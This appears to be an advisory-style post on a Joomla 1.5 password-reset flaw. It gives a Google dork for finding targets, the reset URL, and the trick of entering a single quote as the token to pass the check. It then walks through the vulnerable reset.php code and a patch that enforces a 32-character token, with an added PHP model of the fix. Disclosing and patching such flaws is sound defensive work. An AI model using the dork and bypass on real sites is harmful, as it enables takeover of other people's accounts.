Dork : "Powered by Joomla 1.5" / U'r mind
Exploit : /index.php?option=com_user&view=reset&layout=confirm
Fixed : /components/com_user/models/reset.php
The code inside "reset.php":

    function confirmReset($token)
    {
        global $mainframe;
        $db = &JFactory::getDBO();
        $db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token));

        // Verify the token
        if (!($id = $db->loadResult()))
        {
            $this->setError(JText::_('INVALID_TOKEN'));
            return false;
        }

        // Push the token and user id into the session
        $mainframe->setUserState($this->_namespace.'token', $token);
        $mainframe->setUserState($this->_namespace.'id', $id);

        return true;
    }
Location of the exploitable code:

    $db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token));

If a single-quote character ( ' ) is entered in the Token box, the query that results looks like this:

    SELECT id FROM jos_users WHERE block = 0 AND activation = ''

Note the '' : it means that when you enter ' the check is simply passed without a valid token.
PATCH YOUR SYSTEM :

So how do you apply the patch?

OK, write code like the one below:

    [ CODING PATCH ]
    if(strlen($token) != 32) {
        $this->setError(JText::_('PUT WHATEVER WORDING YOU LIKE HERE'));
        return false;
    }

You are probably wondering where to put that code.

The code goes here, between the two existing lines:

    global $mainframe;
    [ CODING PATCH ]
    $db = &JFactory::getDBO();
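To make the effect of the patch concrete, here is an added, stand-alone PHP model of the check (example code written for this page, not from the original post and not Joomla's own code). The function names `isWellFormedResetToken`, `quoteForSql` and `buildConfirmResetQuery` are assumptions for illustration; `quoteForSql` stands in for `$db->Quote()`, and the hex-charset test on top of the post's length check is an extra assumption added here so that a 32-character string of quotes is rejected as well.

```php
<?php
// Added example (not from the original post or Joomla itself): a stand-alone
// model of the patched confirmReset() token check.

// Joomla 1.5 activation tokens are 32-character hex strings (md5 output).
const RESET_TOKEN_LENGTH = 32;

// Returns true only for a well-formed token. This is the check the post's
// patch adds (length must be exactly 32) plus a hex-charset test, an
// assumption added here so that 32 quote characters are rejected too.
function isWellFormedResetToken($token)
{
    if (!is_string($token) || strlen($token) !== RESET_TOKEN_LENGTH) {
        return false;
    }
    return ctype_xdigit($token);
}

// Simulated stand-in for $db->Quote(): wrap the value in single quotes
// after escaping it. Assumption for illustration only.
function quoteForSql($value)
{
    return "'" . addslashes($value) . "'";
}

// Builds the lookup query only when the token passes the format check and
// returns null (the INVALID_TOKEN path) otherwise. A null should be treated
// as a rejected reset attempt and logged by the caller.
function buildConfirmResetQuery($token)
{
    if (!isWellFormedResetToken($token)) {
        return null;
    }
    return 'SELECT id FROM jos_users WHERE block = 0 AND activation = '
        . quoteForSql($token);
}

// Constructed sample inputs: the single quote from the post, an empty
// string, 32 quote characters, and a well-formed 32-character hex token.
$samples = array(
    "'",
    '',
    str_repeat("'", RESET_TOKEN_LENGTH),
    'e3b0c44298fc1c149afbf4c8996fb924',
);

foreach ($samples as $input) {
    $query = buildConfirmResetQuery($input);
    printf("%-40s => %s\n", var_export($input, true),
        $query === null ? 'rejected (INVALID_TOKEN)' : $query);
}
```

Only the last sample reaches the database query; the others are turned away before any SQL is built, which is the behaviour the patch above is meant to restore in `confirmReset()`.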
Note:
- Source: Google